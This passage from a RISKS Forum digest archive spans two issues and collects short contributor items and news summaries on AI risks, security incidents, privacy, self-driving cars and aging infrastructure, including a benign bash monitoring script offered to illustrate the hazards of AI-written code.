    Kelvin Chan and Barbara Ortutay, Associated Press (06/17/25),
    via ACM TechNews

    Iranian state television has called on citizens to delete WhatsApp from
    their smartphones, claiming the app collects user information to send to Israel. In response, WhatsApp, which employs end-to-end encryption to
    prevent service providers in the middle from reading messages, issued a statement that read, "We do not track your precise location, we don't keep
    logs of who everyone is messaging, and we do not track the personal messages people are sending one another."

    ------------------------------

    Date: Fri, 20 Jun 2025 18:06:23 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: China Unleashes Hackers Against Russia (Megha Rajagopalan)

    Megha Rajagopalan, The New York Times (06/19/25),
    via ACM TechNews

    Since the beginning of the war in Ukraine, groups linked to the Chinese government have repeatedly hacked Russian companies and government
    agencies. While China appears to have plenty of domestic scientific and military expertise, Chinese military experts have lamented that its troops
    lack battlefield experience. Some defense insiders say China sees Russia's
    war in Ukraine as a chance to collect information about modern warfare
    tactics and Western weaponry, and what works against them.

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: China's Spy Agencies Investing Heavily in AI (Julian E. Barnes)

    Julian E. Barnes, *The New York Times* (06/17/25), via ACM TechNews

    A report by researchers at Recorded Future's Insikt Group details
    investments in AI by Chinese spy agencies to develop tools that could
    improve intelligence analysis, help military commanders develop operational plans, and generate early threat warnings. The researchers found that China
    is probably using a mix of large language models, including models from Meta and OpenAI, along with domestic models from DeepSeek, Zhipu AI, and others.

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Amazon Says It Will Reduce Its Workforce as AI Replaces Human
    Employees (CNN)

    Ramishah Maruf and Alicia Wallace, CNN (06/17/25), via ACM TechNews

    Amazon CEO Andy Jassy said in a June 17 blog post that the rollout of generative AI agents will change how work is performed, enabling the company
    to shrink its workforce in the future. Jassy said, "We will need fewer
    people doing some of the jobs that are being done today, and more people
    doing other types of jobs." Employees should view AI as "teammates we can
    call on at various stages of our work, and that will get wiser and more
    helpful with more experience," according to Jassy.

    ------------------------------

    Date: Sat, 14 Jun 2025 06:55:13 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: ChatGPT will avoid being shut down in some life-threatening
    scenarios, former OpenAI researcher claims (Techcrunch)

    A former OpenAI researcher published new research claiming that the
    company's AI models will go to great lengths to stay online.

    https://techcrunch.com/2025/06/11/chatgpt-will-avoid-being-shut-down-in-some-life-threatening-scenarios-former-openai-researcher-claims/

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Big Tech two-factor authentication compromised (Bloomberg)

    Ryan Gallagher, Crofton Black, and Gabriel Geiger, Bloomberg (06/16/25), via
    ACM TechNews

    Concerns are being raised about the middlemen that send two-factor authentication codes to consumers via text on behalf of Big Tech companies, popular apps, banks, encrypted chat platforms, and other senders. An
    industry whistleblower has revealed around 1 million such messages have
    passed through Fink Telecom Services, a Swiss company that cybersecurity researchers have linked to incidents in which the codes were intercepted and used to infiltrate private online accounts. Critics of the industry point to
    a lack of regulation allowing such companies to operate without a license.

    ------------------------------

    Date: Fri, 20 Jun 2025 08:02:07 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: What could go wrong? - AllTrails launches AI route-making tool,
    worrying search-and-rescue members

    https://www.nationalobserver.com/2025/06/17/news/alltrails-ai-tool-search-rescue-members

    ------------------------------

    Date: Thu, 19 Jun 2025 23:43:42 +0000 (UTC)
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: EU weighs sperm donor cap to curb risk of accidental incest

    And now for something completely different - an item which has nothing to do with AI. ;-)

    Eight countries want to discuss an EU limit on the number of children
    conceived from a single sperm donor -- to protect future generations from unwitting incest and psychological harm.

    Donor-conceived births are rising across Europe as fertility rates decline
    and assisted reproduction becomes more widely accessible -- including for same-sex couples and single women. But with many countries struggling to recruit enough local donors, commercial cryobanks are increasingly shipping reproductive cells known as gametes -- sperm or egg -- across borders, sometimes from the same donor to multiple countries.

    Most EU countries have national limits on how many children can be conceived from one donor -- ranging from one in Cyprus to 10 in France, Greece,
    Italy and Poland. However, there is no limit for cross-border donations, increasing the risk of potential health problems linked to a single donor,
    as well as a psychological impact on children who discover they have dozens or even hundreds of half-siblings.

    [Is this an egg-cell-ent move? PGN]

    ------------------------------

    Date: Thu, 19 Jun 2025 08:07:28 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: ChatGPT may be eroding critical thinking skills (MIT)

    https://time.com/7295195/ai-chatgpt-google-learning-school/

    ------------------------------

    Date: Thu, 19 Jun 2025 01:43:14 +0000 (UTC)
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Meta's Privacy Screwup Reveals How People Really See AI Chatbots
    (NYMag)

    https://nymag.com/intelligencer/article/metas-privacy-goof-shows-how-people-really-use-ai-chatbots.html

    ------------------------------

    Date: Sun, 15 Jun 2025 11:59:23 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Tesla blows past stopped school bus and hits kid-sized dummies in
    Full Self-Driving tests (Engadget)

    https://www.engadget.com/transportation/tesla-blows-past-stopped-school-bus-and-hits-kid-sized-dummies-in-full-self-driving-tests-183756251.html

    ------------------------------

    Date: Wed, 18 Jun 2025 20:14:13 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: Couple steals back their own car after tracking an AirTag in it

    *When London police wouldn't recover a stolen car despite an AirTag giving
    its location, the owners say they tracked it down and stole it back for themselves...* [...]

    https://appleinsider.com/articles/25/06/13/couple-steals-back-their-own-car-after-tracking-an-airtag-in-it

    ------------------------------

    Date: Fri, 13 Jun 2025 14:50:31 -0400
    From: "Steven J. Greenwald" <greenwald.steve@gmail.com>
    Subject: Finger Grease Mitigation for Tesla PIN Pad

    From Tesla, a post about how they have mitigated the threat of thieves
    trying to figure out a user's PIN by checking for finger grease on the
    touchscreen.

    "If you set up PIN to drive, a thief would not be able to drive off in your Tesla, even if they somehow gain access to your keycard, phone or vehicle

    "The PIN pad also appears in a slightly different place on the screen every time, so finger grease doesn't give away your PIN.''

    Link to source post on X:
    https://x.com/Tesla/status/1933516310475952191

    ------------------------------

    Date: Mon, 16 Jun 2025 15:15:43 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: San Francisco bicyclist sues over crash involving 2 Waymo cars

    https://www.siliconvalley.com/2025/06/10/san-francisco-bicyclist-crash-waymo/

    ------------------------------

    Date: Tue, 17 Jun 2025 11:35:42 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: I lost Spectrum for about two hours

    Would-be copper thieves caused Internet outage affecting LA and Ventura
    counties (LA Times)

    https://www.latimes.com/california/story/2025-06-15/would-be-copper-thieves-cause-internet-outage-affecting-l-a-ventura-counties

    ------------------------------

    Date: Tue, 17 Jun 2025 11:36:31 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: How scammers are using AI to steal college financial aid (LA Times)

    https://www.latimes.com/california/story/2025-06-17/how-scammers-are-using-ai-to-steal-college-financial-aid

    Fake college enrollments have surged as crime rings deploy "ghost students," chatbots that join online classrooms and stay just long enough to collect a financial aid check. In some cases, professors discover almost no one in
    their class is real.

    ------------------------------

    Date: Fri, 13 Jun 2025 14:24:09 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: U.S. air traffic control still runs on Windows 95 and floppy
    disks (Ars Technica)

    Agency seeks contractors to modernize decades-old systems within four years.

    On Wednesday, acting FAA Administrator Chris Rocheleau told the House Appropriations Committee that the Federal Aviation Administration plans to replace its aging air traffic control systems, which still rely on floppy
    disks and Windows 95 computers, Tom's Hardware reports. The agency has
    issued a Request For Information to gather proposals from companies willing
    to tackle the massive infrastructure overhaul.

    "The whole idea is to replace the system. No more floppy disks or paper strips," Rocheleau said during the committee hearing. Transportation
    Secretary Sean Duffy called the project "the most important infrastructure project that we've had in this country for decades," describing it as a bipartisan priority.

    Most air traffic control towers and facilities across the US currently
    operate with technology that seems frozen in the 20th century, although that isn't necessarily a bad thing—when it works. Some controllers currently use paper strips to track aircraft movements and transfer data between systems using floppy disks, while their computers run Microsoft's Windows 95
    operating system, which launched in 1995.

    https://arstechnica.com/information-technology/2025/06/faa-to-retire-floppy-disks-and-windows-95-amid-air-traffic-control-overhaul/

    ------------------------------

    Date: Wed, 11 Jun 2025 19:02:24 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: States sue to block the sale of genetic data collected by DNA
    testing company 23andMe (LA Times)

    Dozens of states have filed a joint lawsuit <https://www.washingtonpost.com/documents/809d3c27-44d5-4042-80a2-3ea3c1743db2.pdf> against the bankrupt DNA-testing company 23andMe to block the
    company's sale of its customers' genetic data without explicit consent.

    The suit, filed this week in U.S. Bankruptcy Court in the Eastern District
    of Missouri, comes months after 23andMe began a court-supervised sale
    process of its assets.

    The South San Francisco-based venture was once valued at $6 billion and has collected DNA samples from more than 15 million customers.

    https://www.latimes.com/business/story/2025-06-11/23andme-bankruptcy-follow

    ------------------------------

    From: "Steven J. Greenwald" <greenwald.steve@gmail.com>
    Date: Tue, 10 Jun 2025 15:29:47 -0400
    Subject: Using Malicious Image Patches in Social Media to Hijack AI Agents

    From the thread posted on X by the researchers: "Beware: Your AI assistant could be hijacked just by encountering a malicious image online! "Our
    latest research exposes critical security risks in AI assistants. An
    attacker can hijack them by simply posting an image on social media and
    waiting for it to be captured."

    ------------------------------

    Date: Wed, 11 Jun 2025 09:16:25 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Weather precision loss

    As of today (11 June 2025) the NWS forecast for Van Nuys (3 mi SE of the observation site at KVNY Van Nuys Airport) has been changed from that
    specific location to the "Western San Fernando Valley", a larger area. Presumably other point forecasts in the region have also changed. For
    example, yesterday's forecast was for a high of 89; today it says "in the
    80s to around 90". Also, the forecast for Simi Valley has been broadened to "Southeastern Ventura County Valleys" with a range of temperatures instead
    of a single number. Is this a response to falling staff numbers?

    [They could get rid of a huge number of sensors and staff by aggregating
    larger areas. Where I live there are microclimates from San Fran to its
    surroundings, with differences of sometimes 55 degrees within a
    30-mile radius. I suppose this strategy could lead to large-area
    predictions of 55 to 110 for the whole Bay Area. That would not be very
    helpful. PGN]

    ------------------------------

    Date: Thu, 5 Jun 2025 06:02:06 -0700
    From: Rob Slade <rslade@gmail.com>
    Subject: Grief scams on Facebook

    In a very short space of time I have had multiple romance/grief scams
    contacts on Fakebook--all of them (within the first few messages) telling me
    "I can't send you friend request," and either instructing or implying that I should attempt to "friend" them, or contact them via private messaging.

    (Interestingly, in one case, despite the fact that my email address was available, the scammer did *not*, in fact, contact me via email.)

    Facebook/Meta is lousy at protecting its users from such scams. But I
    assume that, somewhere in the bowels of the "algorithm," there is some awareness of the types of messages that scammers send their "friends," and
    thus the scammers have learned to avoid "friending" too many marks at a
    time. I also assume that these attempts are part of an organized scam
    "farm" operation, given the frequency and consistency of the attempts on Facebook, and the avoidance of email.

    ------------------------------

    Date: Sat, 28 Oct 2023 11:11:11 -0800
    From: RISKS-request@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) has moved to the ftp.sri.com site:
    <risksinfo.html>.
    *** Contributors are assumed to have read the full info file for guidelines!

    OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    delightfully searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume/previous directories
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-34.00
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks may have done to URLs.
    Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 34.68
    ************************



  • From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Sat Oct 11 17:56:28 2025
    Risks Digest 34.77

    RISKS-LIST: Risks-Forum Digest Saturday 11 October 2025 Volume 34 : Issue 77

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) Peter G. Neumann, founder and still moderator

    ***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at <http://www.risks.org> as
    <http://catless.ncl.ac.uk/Risks/34.77>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents: [Long gap. Working backwards. I'm still human. PGN]
    How the World's Biggest Car-Makers Fell Behind in Software (FT)
    Why Are Car Software Updates Still So Bad? (WiReD via Gabe Goldberg)
    A delivery robot collided with a disabled man on L.A. street.
    The aftermath is getting ugly (LA Times via Steve Bacher)
    Scientists grow mini human brains to power computers (BBC)
    Apple Announces $2 Million Bug Bounty Reward for the Most Dangerous Exploits
    (WiReD)
    Every question you ask, every comment you make, will be recording you
    (The Register)
    EU to Expand Satellite Defenses After GPS Jamming of EC President's Flight
    (Franklin Okeke)
    NIST Enhances Security Controls for Improved Patching (Arielle Waldman)
    When AI Came for Hollywood (The NY Times)
    Small numbers of poisoned samples can wreck LLM AI models of any size
    (Cornell Study)
    Taco Bell Rethinks Future of Voice AI at Drive-Through (Isabelle Bousquette)
    AI Tool Identifies 1,000 'Questionable' Scientific Journals (Daniel Strain)
    Stanford Study: AI is destroying job prospects for younger workers
    especially in computing (Digital Economy)
    The dangers of AI coding (Lauren Weinstein)
    AI safety tool flags student activity, spurs debate on privacy and accuracy
    (san.com)
    The AI Prompt That Could End the World (The NY Times)
    Recruiters Use AI to Scan Resumes; Applicants Are Trying to Trick It
    (The New York Times)
    Tristan Harris on The Dangers of Unregulated AI on Humanity and the
    Workforce (The Daily Show YouTube)
    The popular conception was that AI would be a danger to civilization because
    AI would be so smart, but the reality turns out to be the danger is that AI
    is so stupid. (Lauren Weinstein)
    AI Data Centers Are an Even Bigger Disaster Than Previously Thought
    (Futurism)
    Microsoft's agent mode is a tool for generating fake data (Pivot to AI)
    Cheer Up, or Else. China Cracks Down on the Haters and Cynics (NYT)
    Criminals offer reporter money to hack BBC (BBC)
    Tech billionaires seem to be doom prepping. Should we all be worried? (BBC)
    Japan faces Asahi beer shortage after cyber-attack (BBC)
    New WireTap Attack Extracts Intel SGX ECDSA Key via DDR4 Memory-Bus
    Interposer (The Hacker News)
    Exploit Allows for Takeover of Fleets of Unitree Robots (Evan Ackerman)
    Google Says 90% of Tech Workers Are Now Using AI at Work (Lisa Eadicicco)
    Neon buys phone calls to train AI, then leaks them all (Martin Ward)
    Government ID data used for age verification stolen (This week in Security)
    Federal cyber agency warns of 'serious and urgent' attack on tech used by
    remote workers (CBC)
    Billions of Dollars ‘Vanished’: Low-Profile Bankruptcy Rings Alarms on Wall
    Street (The New York Times)
    911 Service Is Restored in Louisiana and Mississippi
    How an Internet mapping glitch turned a random Kansas farm into a digital
    hell (Fusion)
    Microsoft cuts off cloud services to Israeli military unit (NBC)
    ShareFile website (Martin Ward)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: How the World's Biggest Car-Makers Fell Behind in Software (FT)

    Kana Inagaki, Harry Dempsey and David Keohane, Financial Times (08/28/25),
    via ACM TechNews

    Legacy automakers are struggling to keep pace with Tesla and Chinese
    electric vehicle makers in the race to build software-defined vehicles.
    Despite hiring tech talent and investing billions, companies like Toyota, Volkswagen, and Volvo face buggy platforms, delays, and rising costs.
    Carmakers are partnering with tech giants like Google, Nvidia, and Rivian,
    but tensions remain over control of data and systems.

    ------------------------------

    Date: Sun, 5 Oct 2025 14:17:02 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Why Are Car Software Updates Still So Bad? (WiReD)

    Over-the-air upgrades can not only transform your ride, they can help carmakers slash costs. Here's why they’re still miles away from being seamless.

    https://www.wired.com/story/why-are-car-software-updates-still-so-bad/

    Omits two critical issues: security of updates (preventing malware), and bricking cars -- "bricking" does appear in a section heading, but only meaning reduced function rather than, you know, making a car useless.

    I badgered auto execs about these issues and got nothing but "it'll be wonderful".

    ------------------------------

    Date: Fri, 26 Sep 2025 07:15:09 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: A delivery robot collided with a disabled man on L.A. street.
    The aftermath is getting ugly (LA Times)

    A collision in West Hollywood between a delivery robot and a man using a mobility scooter went viral, generating attacks on the robot company and
    on the man himself.

    https://www.latimes.com/california/story/2025-09-25/viral-video-of-delivery-robot-colliding-with-man-in-wheelchair-sparks-accessibility-debate

    ------------------------------

    Date: Sat, 4 Oct 2025 17:30:25 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Scientists grow mini human brains to power computers (BBC)

    https://www.bbc.com/news/articles/cy7p1lzvxjro

    It may have its roots in science fiction, but a small number of researchers
    are making real progress trying to create computers out of living cells.

    Welcome to the weird world of biocomputing.

    Among those leading the way are a group of scientists in Switzerland, who I went to meet.

    One day, they hope we could see data centres full of "living" servers which replicate aspects of how artificial intelligence (AI) learns - and could
    use a fraction of the energy of current methods.

    ------------------------------

    Date: Fri, 10 Oct 2025 12:28:32 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Apple Announces $2 Million Bug Bounty Reward for the Most Dangerous
    Exploits (WiReD)

    With the mercenary spyware industry booming, Apple VP Ivan Krstić tells
    WIRED that the company is also offering bonuses that could bring the max
    total reward for iPhone exploits to $5 million.

    https://www.wired.com/story/apple-announces-2-million-bug-bounty-reward/

    Apple Took Down These ICE-Tracking Apps. The Developers Aren't Giving Up. “We are going to do everything in our power to fight this,” says ICEBlock developer Joshua Aaron after Apple removed his app from the App
    Store.

    https://www.wired.com/story/apple-took-down-ice-tracking-apps-their-developers-arent-giving-up/

    ------------------------------

    Date: Mon, 18 Aug 2025 16:53:36 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Every question you ask, every comment you make, will be
    recording you (The Register)

    When you're asking AI chatbots for answers, they're data-mining you

    https://www.theregister.com/2025/08/18/opinion_column_ai_surveillance/?td=rt-3a

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: EU to Expand Satellite Defenses After GPS Jamming of EC
    President's Flight (Franklin Okeke)

    Franklin Okeke, Computing (U.K.) (09/02/25), via ACM TechNews

    The European Union (EU) plans to deploy additional satellites in low Earth orbit to strengthen its ability to detect GPS interference, following an incident targeting European Commission (EC) President Ursula von der Leyen's flight. Pilots reportedly had to rely on paper maps to land von der Leyen's plane safely in Plovdiv, Bulgaria. An EU spokesperson said Bulgarian authorities suspect Russia was behind the jamming, though the Kremlin denies involvement. Similar GPS disruptions have affected the Baltic region and previous EU and U.K. flights.

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: NIST Enhances Security Controls for Improved Patching
    (Arielle Waldman)

    Arielle Waldman, Dark Reading (09/02/25), via ACM TechNews

    The U.S. National Institute of Standards and Technology (NIST) updated its Security and Privacy Control catalog to improve software patch and update management. The revisions focus on three key areas: standardized logging
    syntax to speed incident response, root-cause analysis to address underlying software issues, and designing systems for cyber-resiliency to maintain critical functions under attack. The update also emphasizes least-privilege access, flaw-remediation testing, and coordinated notifications.

    ------------------------------

    Date: Sat, 4 Oct 2025 22:23:13 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: When AI Came for Hollywood (The NY Times)

    https://www.nytimes.com/2025/10/04/opinion/ai-hollywood-tilly-norwood-actress.html

    In the immortal words of Emily Blunt, ``Good Lord, we're screwed.''

    She was on a podcast with Variety Monday when she was handed a headline
    about cinema's latest sensation, Tilly Norwood.

    Agents are circling the hot property, a fresh-faced young British brunette actress who is attracting global attention.

    Norwood is AI, and Blunt is P.O.ed. In fact, she says, she's terrified.

    Told that Tilly's creator, Eline Van der Velden, a Dutch former actress
    with a master's in physics, wants her to be the next Scarlett Johansson,
    Blunt protested. But we have Scarlett Johansson. (Cue the Invasion of
    the Body Snatchers music.)

    [This item follows Matthew's earlier item:
    She can fight monsters, flee explosions, and even cry on Graham Norton --
    but Tilly Norwood is no Hollywood darling.
    https://www.cbc.ca/news/entertainment/ai-actress-backlash-1.7647478
    I wonder if her eyes have back-lashes? I am afraid some of you may be
    her pupils, in which case she should have been named IRIS. Tilly seems Silly,
    unless money is flowing into the Till(y). But she is certainly proof
    that AI has no limits. PGN]

    ------------------------------

    Date: Thu, 9 Oct 2025 14:25:42 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Small numbers of poisoned samples can wreck LLM AI models of any
    size (Cornell Study)

    https://arxiv.org/pdf/2510.07192

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Taco Bell Rethinks Future of Voice AI at Drive-Through
    (Isabelle Bousquette)

    Isabelle Bousquette, The Wall Street Journal (08/29/25), via ACM TechNews

    Taco Bell has seen mixed results in its experiment with voice AI ordering at over 500 drive-throughs. Customers have reported glitches, delays, and even trolled the system with absurd orders, prompting concerns about reliability. The fast-food chain's Dane Mathews acknowledged the technology sometimes disappoints, noting it may not suit all locations, especially high-traffic ones. The chain is reassessing where AI adds value and when human staff
    should step in.

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: AI Tool Identifies 1,000 'Questionable' Scientific Journals
    (Daniel Strain)

    Daniel Strain, CU Boulder Today (08/28/25), via ACM TechNews

    Computer scientists at the University of Colorado Boulder developed an AI platform to identify questionable or "predatory" scientific journals. These journals often charge researchers high fees to publish work without proper
    peer review, undermining scientific credibility. The AI, trained on data
    from the non-profit Directory of Open Access Journals, analyzed 15,200
    journals and flagged over 1,400 as suspicious, with human experts later confirming more than 1,000 as likely problematic. The tool evaluates
    editorial boards, website quality, and publication practices.

    ------------------------------

    Date: Tue, 26 Aug 2025 07:04:13 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Stanford Study: AI is destroying job prospects for younger workers
    especially in computing (Digital Economy)

    The Big Tech billionaire CEOs are toasting the destruction of young
    people's lives. THEY DO NOT CARE ABOUT YOU. -L

    https://digitaleconomy.stanford.edu/wp-content/uploads/2025/08/Canaries_BrynjolfssonChandarChen.pdf

    ------------------------------

    Date: Sat, 4 Oct 2025 09:02:12 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: The dangers of AI coding

    I am SO glad I phased out of most coding years ago, except as needed for my
    own systems. Those jobs are toast. But the dangers are very real.

    Just now I needed a Bash script for a network monitoring task. I must have written dozens of these in various forms over the years. Pings and status
    flags and the usual stuff.

    So this time, just for the hell of it, I asked Gemini (free version of
    course) to do it:

    "write me a bash script that will ping a specific ip address and when the
    pings start failing keep trying to ping and then when the pings are
    successful again send a specific curl command to that ip address"

    And about 10 seconds or less later out came a completely reasonable-looking,
    nicely commented Bash script, along with a reminder to make the file
    executable and how to stop it with ^C.
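    For concreteness, here is a minimal hand-written sketch of the kind of
    script that prompt describes -- illustrative only, not the actual Gemini
    output; the target address (a reserved documentation IP) and the curl
    endpoint are placeholders:

      #!/usr/bin/env bash
      # Sketch: ping a host; once pings have failed and the host later
      # becomes reachable again, send a curl request to it.

      TARGET_IP="192.0.2.1"      # placeholder address (TEST-NET-1)
      CHECK_INTERVAL=5           # seconds between ping attempts
      was_down=0

      while true; do
          if ping -c 1 -W 2 "$TARGET_IP" > /dev/null 2>&1; then
              if [ "$was_down" -eq 1 ]; then
                  # Host is back after an outage: fire the curl command.
                  curl -s "http://$TARGET_IP/recovered" > /dev/null
                  was_down=0
              fi
          else
              was_down=1         # pings are failing; remember the outage
          fi
          sleep "$CHECK_INTERVAL"
      done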

    This of course is a very simple, really trivial task, and I was able to
    quickly read through the code and verify that it looked correct.

    The problem of course is obvious. I could do this verification only because
    I have enough skill to easily write that code MYSELF; it would just take me more time. If the code were more complex and/or voluminous, just checking
    could range from very lengthy to utterly impractical to do at all, meaning
    any errors could go undetected with everything that implies, especially for dangerous "sleeper" bugs.

    There may be a useful analogy to vehicle driver-assist systems, which may
    lull drivers into being less attentive, leaving them unable to
    respond to emergency situations quickly when their intervention is most required.

    Crashing code and crashing cars. All very dangerous.

    ------------------------------

    Date: Thu, 25 Sep 2025 14:54:28 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: AI safety tool flags student activity, spurs debate on privacy and
    accuracy (san.com)

    https://san.com/cc/ai-safety-tool-flags-student-activity-spurs-debate-on-privacy-and-accuracy/

    In federal lawsuit, students allege Lawrence school district's AI
    surveillance tool violates their rights

    https://lawrencekstimes.com/2025/08/01/usd497-gaggle-lawsuit-filed/

    ------------------------------

    Date: Fri, 10 Oct 2025 15:48:55 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: The AI Prompt That Could End the World (The NY Times)

    https://www.nytimes.com/2025/10/10/opinion/ai-destruction-technology-future.html

    How much do we have to fear from AI, really? It's a question I've been
    asking experts since the debut of ChatGPT in late 2022.

    The AI pioneer Yoshua Bengio, a computer science professor at the Université de Montréal, is the most-cited researcher alive, in any discipline. When I spoke with him in 2024, Dr. Bengio told me that he had trouble sleeping while thinking of the future. Specifically, he was worried that an AI would engineer a lethal pathogen -- some sort of
    super-coronavirus -- to eliminate humanity. ``I don't think there's
    anything close in terms of the scale of danger,'' he said.

    Contrast Dr. Bengio's view with that of his frequent collaborator Yann
    LeCun, who heads AI research at Mark Zuckerberg's Meta. Like Dr. Bengio,
    Dr. LeCun is one of the world's most-cited scientists. He thinks that AI
    will usher in a new era of prosperity and that discussions of existential
    risk are ridiculous. ``You can think of A.I. as an amplifier of human intelligence,'' he said in 2023.

    ------------------------------

    Date: Thu, 9 Oct 2025 15:24:59 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Recruiters Use AI to Scan Resumes; Applicants Are Trying to Trick
    It (The New York Times)

    In an escalating cat-and-mouse game, job hunters are trying to fool AI into moving their applications to the top of the pile with embedded instructions.

    https://www.nytimes.com/2025/10/07/business/ai-chatbot-prompts-resumes.html?smid=nytcore-ios-share&referringSource=articleShare

    ...read comments.

    ------------------------------

    Date: Wed, 8 Oct 2025 17:28:53 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Tristan Harris on The Dangers of Unregulated AI on Humanity and
    the Workforce (The Daily Show YouTube)

    “This does not have to be our destiny.” Co-founder of the Center for Humane Technology Tristan Harris sits down with Jon Stewart to discuss how AI has already disrupted the workforce as current iterations of the technology have dropped entry-level work by 13%, tech companies' prioritization of their first-to-market stance over product and human safety, and how reliance on AI
    is stifling human growth. #DailyShow #TristanHarris #AI

    https://www.youtube.com/watch?v=675d_6WGPbo

    [Also noted by Matthew Kruk. PGN]

    ------------------------------

    Date: Tue, 7 Oct 2025 08:25:38 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: The popular conception was that AI would be a danger to
    civilization because AI would be so smart, but the reality turns out to be
    the danger is that AI is so stupid.

    ------------------------------

    Date: Sat, 11 Oct 2025 08:52:15 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: AI Data Centers Are an Even Bigger Disaster Than Previously Thought
    (Futurism)

    https://futurism.com/future-society/ai-data-centers-finances

    ------------------------------

    Date: Thu, 2 Oct 2025 11:00:41 +0100
    From: Martin Ward <martin@gkc.org.uk>
    Subject: Microsoft's agent mode is a tool for generating fake data
    (Pivot to AI via YouTube)

    Microsoft has put a Copilot document generator into the online version of Office 365, called "agent mode". Quote: "In the same way vibe coding has transformed software development, the latest reasoning models in Copilot
    unlock agentic productivity for office artifacts."

    This is a gadget for faking evidence.

    Security researcher Kevin Beaumont gave agent mode a good tryout. He asked
    it: "Make a spreadsheet about how our endpoint detection response tool
    blocks 100% of ransomware." It did exactly that. It made up a spreadsheet
    of completely fake data about the product's effectiveness. With graphs.

    Pivot to AI report:
    https://www.youtube.com/watch?v=kH59-8dD08g

    ------------------------------

    Date: Tue, 7 Oct 2025 23:09:51 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Cheer Up, or Else. China Cracks Down on the Haters and Cynics (NYT)

    https://www.nytimes.com/2025/10/08/world/asia/china-censorship-pessimism-despair.html

    As China struggles with economic discontent, Internet censors are
    silencing those who voice doubts about work, marriage, or simply sigh too
    loudly online.

    ------------------------------

    Date: Mon, 29 Sep 2025 11:45:38 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Criminals offer reporter money to hack BBC (BBC)

    https://www.bbc.com/news/articles/c3w5n903447o

    Like many things in the shadowy world of cyber-crime, an insider threat
    is something very few people have experience of.

    Even fewer people want to talk about it.

    But I was given a unique and worrying experience of how hackers can
    leverage insiders when I myself was recently propositioned by a criminal
    gang.

    "If you are interested, we can offer you 15% of any ransom payment if you
    give us access to your PC."

